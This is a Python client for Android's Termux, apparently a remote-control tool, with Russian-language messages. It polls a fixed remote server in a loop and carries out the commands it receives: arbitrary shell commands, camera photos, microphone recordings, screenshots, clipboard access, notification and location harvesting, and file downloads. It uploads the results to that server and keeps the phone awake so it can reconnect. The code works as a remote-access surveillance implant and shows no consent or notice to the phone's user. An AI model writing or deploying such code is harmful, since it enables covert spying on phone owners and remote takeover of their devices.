Spaces:
Sleeping
Sleeping
import requests | |
import time | |
import subprocess | |
import os | |
import json | |
import shutil | |
SERVER_URL = "https://aleksmorshen-contrem.hf.space" | |
TERMUX_API_PATH = "/data/data/com.termux/files/usr/bin/" | |
CLIENT_TEMP_DIR = "/data/data/com.termux/files/home/client_temp_files" | |
current_path = "~" | |
RETRY_DELAY_SECONDS = 15 # Задержка между попытками переподключения | |
def ensure_client_temp_dir(): | |
if not os.path.exists(CLIENT_TEMP_DIR): | |
os.makedirs(CLIENT_TEMP_DIR, exist_ok=True) | |
def get_absolute_path(path_to_resolve, base_path): | |
expanded_base_path = os.path.expanduser(base_path) if base_path == "~" else base_path | |
if os.path.isabs(path_to_resolve): | |
abs_path = os.path.normpath(path_to_resolve) | |
else: | |
abs_path = os.path.normpath(os.path.join(expanded_base_path, path_to_resolve)) | |
home_dir_abs = os.path.expanduser("~") | |
if abs_path == home_dir_abs: | |
return "~" | |
return abs_path | |
def execute_shell_command(command_str, work_dir_param): | |
global current_path | |
resolved_work_dir = os.path.expanduser(work_dir_param) if work_dir_param == "~" else work_dir_param | |
try: | |
if command_str.strip().startswith("cd "): | |
new_dir_candidate = command_str.strip()[3:].strip() | |
if not new_dir_candidate: new_dir_candidate = "~" | |
target_dir_resolved_for_os = get_absolute_path(new_dir_candidate, resolved_work_dir) | |
if new_dir_candidate == "~" or target_dir_resolved_for_os == os.path.expanduser("~"): | |
target_display_path = "~" | |
actual_os_path_for_check = os.path.expanduser("~") | |
else: | |
target_display_path = target_dir_resolved_for_os | |
actual_os_path_for_check = target_dir_resolved_for_os | |
if os.path.isdir(actual_os_path_for_check): | |
current_path = target_display_path | |
return f"Директория изменена на: {current_path}" | |
else: | |
return f"Ошибка: Директория не найдена или не является директорией: {actual_os_path_for_check} (из {new_dir_candidate})" | |
result = subprocess.run(command_str, shell=True, capture_output=True, text=True, cwd=resolved_work_dir, timeout=30) | |
output = result.stdout if result.stdout else "" | |
if result.stderr: | |
output += f"\nОшибки:\n{result.stderr}" | |
return output if output else "Команда выполнена, нет вывода." | |
except subprocess.TimeoutExpired: | |
return "Ошибка: Команда выполнялась слишком долго (таймаут)." | |
except Exception as e: | |
return f"Исключение при выполнении команды: {str(e)}" | |
def termux_api_command(api_args_list, parse_json=False): | |
try: | |
base_command = [os.path.join(TERMUX_API_PATH, api_args_list[0])] | |
full_command = base_command + api_args_list[1:] | |
process = subprocess.Popen(full_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, encoding='utf-8', errors='replace') | |
stdout_res, stderr_res = process.communicate(timeout=90) | |
stdout_res = stdout_res.strip() if stdout_res else "" | |
stderr_res = stderr_res.strip() if stderr_res else "" | |
if process.returncode == 0: | |
if parse_json: | |
try: | |
if not stdout_res: return {"success": True, "message": f"{api_args_list[0]} выполнена, нет JSON вывода."} | |
return json.loads(stdout_res) | |
except json.JSONDecodeError: | |
return {"error": "Failed to parse JSON from API", "raw_output": stdout_res} | |
return stdout_res if stdout_res else f"{api_args_list[0]} выполнена." | |
else: | |
error_msg_dict = {"error": f"Ошибка Termux API ({api_args_list[0]})"} | |
if stderr_res: error_msg_dict["details"] = stderr_res | |
elif stdout_res: error_msg_dict["details"] = stdout_res | |
else: error_msg_dict["details"] = "Неизвестная ошибка." | |
return error_msg_dict if parse_json else f"{error_msg_dict['error']}: {error_msg_dict.get('details', '')}" | |
except subprocess.TimeoutExpired: | |
return {"error": f"Ошибка: {api_args_list[0]} выполнялась слишком долго."} if parse_json else f"Ошибка: {api_args_list[0]} выполнялась слишком долго." | |
except FileNotFoundError: | |
return {"error": f"Ошибка: {api_args_list[0]} не найден."} if parse_json else f"Ошибка: {api_args_list[0]} не найден." | |
except Exception as e: | |
return {"error": f"Исключение при Termux API: {str(e)}"} if parse_json else f"Исключение при Termux API: {str(e)}" | |
def list_files_detailed(path_to_list_param): | |
global current_path | |
path_for_os_calls = "" | |
new_current_path_display = "" | |
if path_to_list_param == "..": | |
base_for_parent = os.path.expanduser(current_path) if current_path == "~" else current_path | |
path_for_os_calls = os.path.normpath(os.path.join(base_for_parent, "..")) | |
else: | |
path_for_os_calls = get_absolute_path(path_to_list_param, current_path) | |
if path_for_os_calls == "~": | |
path_for_os_calls = os.path.expanduser("~") | |
if path_for_os_calls == os.path.expanduser("~"): | |
new_current_path_display = "~" | |
else: | |
new_current_path_display = path_for_os_calls | |
if not os.path.exists(path_for_os_calls): | |
return f"Ошибка: Путь '{path_for_os_calls}' не существует." | |
if not os.path.isdir(path_for_os_calls): | |
return f"Ошибка: '{path_for_os_calls}' не является директорией." | |
current_path = new_current_path_display | |
try: | |
items = os.listdir(path_for_os_calls) | |
output_str = f"Содержимое '{current_path}':\n" | |
dirs = [] | |
files = [] | |
for item_name in items: | |
item_full_path = os.path.join(path_for_os_calls, item_name) | |
if os.path.isdir(item_full_path): | |
dirs.append(f"[D] {item_name}") | |
else: | |
files.append(f"[F] {item_name}") | |
for d_item in sorted(dirs): | |
output_str += d_item + "\n" | |
for f_item in sorted(files): | |
output_str += f_item + "\n" | |
return output_str.strip() | |
except PermissionError: | |
return f"Ошибка: Нет прав доступа к '{path_for_os_calls}'." | |
except Exception as e: | |
return f"Ошибка листинга файлов: {str(e)}" | |
def client_uploads_file_to_server(filename_param, origin_command_type="unknown"): | |
global current_path | |
if os.path.isabs(filename_param): | |
filepath_on_client_abs = filename_param | |
else: | |
base_dir_for_resolve = os.path.expanduser(current_path) if current_path == "~" else current_path | |
filepath_on_client_abs = os.path.normpath(os.path.join(base_dir_for_resolve, filename_param)) | |
if not os.path.exists(filepath_on_client_abs) or not os.path.isfile(filepath_on_client_abs): | |
return f"Ошибка: Файл '{filepath_on_client_abs}' не найден или не является файлом для загрузки на сервер." | |
try: | |
with open(filepath_on_client_abs, 'rb') as f: | |
files_payload = {'file': (os.path.basename(filepath_on_client_abs), f)} | |
data_payload = {'origin_command_type': origin_command_type} | |
response = requests.post(f"{SERVER_URL}/upload_from_client", files=files_payload, data=data_payload, timeout=180) | |
response.raise_for_status() | |
return f"Файл '{os.path.basename(filepath_on_client_abs)}' отправлен на сервер. Ответ: {response.text}" | |
except requests.exceptions.RequestException as e: | |
return f"Сетевая ошибка при загрузке файла на сервер: {str(e)}" | |
except Exception as e: | |
return f"Ошибка при отправке файла на сервер: {str(e)}" | |
def take_photo_client(camera_id='0'): | |
ensure_client_temp_dir() | |
temp_photo_name = "temp_photo.jpg" | |
photo_path_abs = os.path.join(CLIENT_TEMP_DIR, temp_photo_name) | |
if os.path.exists(photo_path_abs): os.remove(photo_path_abs) | |
api_result = termux_api_command(['termux-camera-photo', '-c', camera_id, photo_path_abs]) | |
if os.path.exists(photo_path_abs) and os.path.getsize(photo_path_abs) > 0 : | |
upload_status = client_uploads_file_to_server(photo_path_abs, origin_command_type="take_photo") | |
try: os.remove(photo_path_abs) | |
except: pass | |
return f"Фото сделано (камера {camera_id}). API: '{api_result}'.\nЗагрузка: {upload_status}" | |
else: | |
err_msg = f"Не удалось сделать фото. API: '{api_result}'." | |
if os.path.exists(photo_path_abs): | |
err_msg += " Файл создан, но пуст." | |
try: os.remove(photo_path_abs) | |
except: pass | |
else: | |
err_msg += " Файл не создан." | |
return err_msg | |
def record_audio_client(duration_sec='5'): | |
ensure_client_temp_dir() | |
temp_audio_name = "temp_audio.mp3" | |
audio_path_abs = os.path.join(CLIENT_TEMP_DIR, temp_audio_name) | |
if os.path.exists(audio_path_abs): os.remove(audio_path_abs) | |
limit = str(max(1, int(duration_sec))) | |
api_result = termux_api_command(['termux-microphone-record', '-f', audio_path_abs, '-l', limit]) | |
time.sleep(int(limit) + 2) | |
if os.path.exists(audio_path_abs) and os.path.getsize(audio_path_abs) > 0: | |
upload_status = client_uploads_file_to_server(audio_path_abs, origin_command_type="record_audio") | |
try: os.remove(audio_path_abs) | |
except: pass | |
return f"Аудио ({limit} сек) записано. API: '{api_result}'.\nЗагрузка: {upload_status}" | |
else: | |
err_msg = f"Не удалось записать аудио. API: '{api_result}'." | |
if os.path.exists(audio_path_abs): | |
err_msg += " Файл создан, но пуст." | |
try: os.remove(audio_path_abs) | |
except: pass | |
else: | |
err_msg += " Файл не создан." | |
return err_msg | |
def take_screenshot_client(): | |
ensure_client_temp_dir() | |
screenshot_filename_base = f"screenshot_{int(time.time())}.png" | |
screenshot_path_abs = os.path.join(CLIENT_TEMP_DIR, screenshot_filename_base) | |
if os.path.exists(screenshot_path_abs): | |
os.remove(screenshot_path_abs) | |
api_result_raw = termux_api_command(['termux-screenshot', screenshot_path_abs]) | |
api_success_message = f"Команда termux-screenshot выполнена (статус: {api_result_raw if api_result_raw else 'успешно, нет вывода'})." | |
time.sleep(1.5) | |
if os.path.exists(screenshot_path_abs) and os.path.getsize(screenshot_path_abs) > 100: | |
upload_status = client_uploads_file_to_server(screenshot_path_abs, origin_command_type="screenshot") | |
try: os.remove(screenshot_path_abs) | |
except: pass | |
return f"Скриншот сделан. {api_success_message}\nЗагрузка: {upload_status}" | |
else: | |
err_msg = f"Не удалось сделать скриншот или файл пуст. {api_success_message}." | |
if os.path.exists(screenshot_path_abs): | |
err_msg += f" Файл '{screenshot_filename_base}' существует, но его размер {os.path.getsize(screenshot_path_abs)} байт." | |
else: | |
err_msg += f" Файл '{screenshot_filename_base}' не создан." | |
return err_msg | |
def receive_file_from_server(download_url, target_path_on_device_str, original_filename): | |
global current_path | |
try: | |
if target_path_on_device_str.startswith("~/"): | |
base_dir = os.path.expanduser("~") | |
path_suffix = target_path_on_device_str[2:] | |
resolved_target_base = os.path.join(base_dir, path_suffix) | |
elif os.path.isabs(target_path_on_device_str): | |
resolved_target_base = target_path_on_device_str | |
else: | |
current_expanded = os.path.expanduser(current_path) if current_path == "~" else current_path | |
resolved_target_base = os.path.join(current_expanded, target_path_on_device_str) | |
resolved_target_base = os.path.normpath(resolved_target_base) | |
final_save_path = "" | |
if target_path_on_device_str.endswith(os.sep) or os.path.isdir(resolved_target_base): | |
os.makedirs(resolved_target_base, exist_ok=True) | |
final_save_path = os.path.join(resolved_target_base, original_filename) | |
else: | |
parent_dir_of_target = os.path.dirname(resolved_target_base) | |
os.makedirs(parent_dir_of_target, exist_ok=True) | |
final_save_path = resolved_target_base | |
response = requests.get(download_url, stream=True, timeout=180) | |
response.raise_for_status() | |
with open(final_save_path, 'wb') as f: | |
for chunk in response.iter_content(chunk_size=8192): | |
f.write(chunk) | |
return f"Файл '{original_filename}' успешно сохранен в '{final_save_path}'." | |
except requests.exceptions.RequestException as e: | |
return f"Сетевая ошибка при скачивании файла с сервера: {str(e)}" | |
except IOError as e: | |
return f"Ошибка записи файла '{original_filename}' в '{final_save_path if 'final_save_path' in locals() else target_path_on_device_str}': {str(e)}" | |
except Exception as e: | |
return f"Общая ошибка при получении файла '{original_filename}': {str(e)}" | |
def get_clipboard_client(): | |
return termux_api_command(['termux-clipboard-get']) | |
def set_clipboard_client(text_to_set): | |
try: | |
process = subprocess.Popen([os.path.join(TERMUX_API_PATH, 'termux-clipboard-set')], stdin=subprocess.PIPE, text=True, encoding='utf-8', errors='replace') | |
process.communicate(input=text_to_set, timeout=10) | |
if process.returncode == 0: | |
return "Текст установлен в буфер обмена." | |
else: | |
return "Ошибка установки текста в буфер обмена." | |
except subprocess.TimeoutExpired: | |
return "Таймаут при установке текста в буфер обмена." | |
except Exception as e: | |
return f"Ошибка API буфера обмена: {str(e)}" | |
def open_url_client(url_to_open): | |
if not url_to_open.startswith(('http://', 'https://')): | |
url_to_open = 'http://' + url_to_open | |
return termux_api_command(['termux-open-url', url_to_open]) | |
def get_device_status_client(item_to_get=None): | |
status_update = {} | |
general_output_messages = [] | |
if item_to_get is None or item_to_get == 'battery': | |
battery_data = termux_api_command(['termux-battery-status'], parse_json=True) | |
if isinstance(battery_data, dict) and 'error' not in battery_data: | |
status_update['battery'] = battery_data | |
else: | |
error_detail = battery_data.get("error", "Unknown battery error") if isinstance(battery_data, dict) else str(battery_data) | |
status_update['battery'] = {"error": error_detail} | |
general_output_messages.append(f"Батарея: {error_detail}") | |
if item_to_get is None or item_to_get == 'location': | |
location_data = termux_api_command(['termux-location', '-p', 'network', '-r', 'once'], parse_json=True) | |
if isinstance(location_data, dict) and 'error' not in location_data: | |
status_update['location'] = location_data | |
else: | |
error_detail = location_data.get("error", "Unknown location error") if isinstance(location_data, dict) else str(location_data) | |
status_update['location'] = {"error": error_detail} | |
general_output_messages.append(f"Локация: {error_detail}") | |
if item_to_get is None or item_to_get == 'processes': | |
try: | |
result = subprocess.run("ps ux", shell=True, capture_output=True, text=True, timeout=10, encoding='utf-8', errors='replace') | |
if result.returncode == 0: | |
status_update['processes'] = result.stdout | |
else: | |
status_update['processes'] = f"Ошибка получения процессов: {result.stderr}" | |
general_output_messages.append(status_update['processes']) | |
except Exception as e: | |
status_update['processes'] = f"Исключение при получении процессов: {str(e)}" | |
general_output_messages.append(status_update['processes']) | |
output_msg = "Статус устройства обновлен." | |
if general_output_messages: | |
output_msg += "\nПроблемы:\n" + "\n".join(general_output_messages) | |
return status_update, output_msg | |
def get_notifications_client(): | |
notifications_data = termux_api_command(['termux-notification-list'], parse_json=True) | |
if isinstance(notifications_data, list): | |
return notifications_data, "Список уведомлений получен." | |
elif isinstance(notifications_data, dict) and 'error' in notifications_data: | |
return [], f"Ошибка получения уведомлений: {notifications_data.get('details', notifications_data['error'])}" | |
else: | |
return [], f"Неожиданный ответ от API уведомлений: {str(notifications_data)}" | |
def main_loop(): | |
global current_path, last_heartbeat_time # last_heartbeat_time should be global if used across reconnections | |
last_heartbeat_time = 0 | |
post_data = {} | |
while True: | |
post_data.clear() | |
post_data['current_path'] = current_path | |
try: | |
if time.time() - last_heartbeat_time > 20: | |
post_data['heartbeat'] = True | |
battery_info, _ = get_device_status_client(item_to_get='battery') | |
if battery_info: | |
post_data['device_status_update'] = battery_info | |
response = requests.get(f"{SERVER_URL}/get_command", timeout=15) | |
response.raise_for_status() # Will raise HTTPError for bad responses (4xx or 5xx) | |
# If we reach here, connection is successful | |
if 'print_once_connected' in globals() and print_once_connected: | |
print("Успешное подключение к серверу.") | |
del globals()['print_once_connected'] # Print only once after successful connection | |
command_data = response.json() | |
output_for_server = None | |
if command_data: | |
cmd_type = command_data.get('type') | |
if cmd_type == 'shell': | |
output_for_server = execute_shell_command(command_data['command'], current_path) | |
elif cmd_type == 'list_files': | |
output_for_server = list_files_detailed(command_data['path']) | |
elif cmd_type == 'upload_to_server': | |
output_for_server = client_uploads_file_to_server(command_data['filename'], origin_command_type=cmd_type) | |
elif cmd_type == 'take_photo': | |
output_for_server = take_photo_client(command_data.get('camera_id', '0')) | |
elif cmd_type == 'record_audio': | |
output_for_server = record_audio_client(command_data.get('duration', '5')) | |
elif cmd_type == 'screenshot': | |
output_for_server = take_screenshot_client() | |
elif cmd_type == 'receive_file': | |
output_for_server = receive_file_from_server( | |
command_data['download_url'], | |
command_data['target_path'], | |
command_data['original_filename'] | |
) | |
elif cmd_type == 'clipboard_get': | |
output_for_server = get_clipboard_client() | |
elif cmd_type == 'clipboard_set': | |
output_for_server = set_clipboard_client(command_data['text']) | |
elif cmd_type == 'open_url': | |
output_for_server = open_url_client(command_data['url']) | |
elif cmd_type == 'get_device_status': | |
status_payload, status_output_msg = get_device_status_client(command_data.get('item')) | |
post_data['device_status_update'] = status_payload | |
output_for_server = status_output_msg | |
elif cmd_type == 'get_notifications': | |
notifications_list, notifications_msg = get_notifications_client() | |
post_data['notifications_update'] = notifications_list | |
output_for_server = notifications_msg | |
else: | |
output_for_server = "Неизвестный тип команды получен клиентом." | |
if output_for_server: | |
post_data['output'] = str(output_for_server) | |
if post_data: | |
requests.post(f"{SERVER_URL}/submit_client_data", json=post_data, timeout=25) | |
if post_data.get('heartbeat'): | |
last_heartbeat_time = time.time() | |
except requests.exceptions.RequestException as e: | |
print(f"Ошибка сети или сервера: {e}. Повторная попытка через {RETRY_DELAY_SECONDS} секунд...") | |
globals()['print_once_connected'] = True # Set flag to print upon next successful connection | |
time.sleep(RETRY_DELAY_SECONDS) | |
continue # Restart the loop for a new connection attempt | |
except Exception as e: | |
print(f"Общая ошибка в цикле клиента: {e}") | |
error_payload = {'output': f"Критическая ошибка на клиенте: {str(e)}", 'current_path': current_path} | |
try: | |
requests.post(f"{SERVER_URL}/submit_client_data", json=error_payload, timeout=10) | |
except: | |
pass # If sending error fails, just log locally and retry connection | |
print(f"Повторная попытка подключения через {RETRY_DELAY_SECONDS} секунд...") | |
globals()['print_once_connected'] = True | |
time.sleep(RETRY_DELAY_SECONDS) | |
continue | |
time.sleep(2.5) | |
if __name__ == '__main__': | |
current_path = "~" | |
if not os.path.isdir(os.path.expanduser(current_path)): | |
current_path = "/data/data/com.termux/files/home" | |
if not os.path.isdir(current_path): | |
current_path = "." | |
ensure_client_temp_dir() | |
print(f"Клиент запущен. Попытка подключения к серверу: {SERVER_URL}") | |
try: | |
termux_api_command(['termux-wake-lock']) | |
except Exception as e: | |
print(f"Предупреждение: Не удалось установить termux-wake-lock: {e}") | |
# This global flag helps print "connected" message only once after a series of failed attempts | |
globals()['print_once_connected'] = True | |
try: | |
main_loop() # Start the main operational loop with reconnection logic | |
except KeyboardInterrupt: | |
print("Клиент остановлен вручную.") | |
finally: | |
try: | |
termux_api_command(['termux-wake-unlock']) | |
except Exception as e: | |
print(f"Предупреждение: Не удалось снять termux-wake-unlock: {e}") | |
print("Завершение работы клиента.") |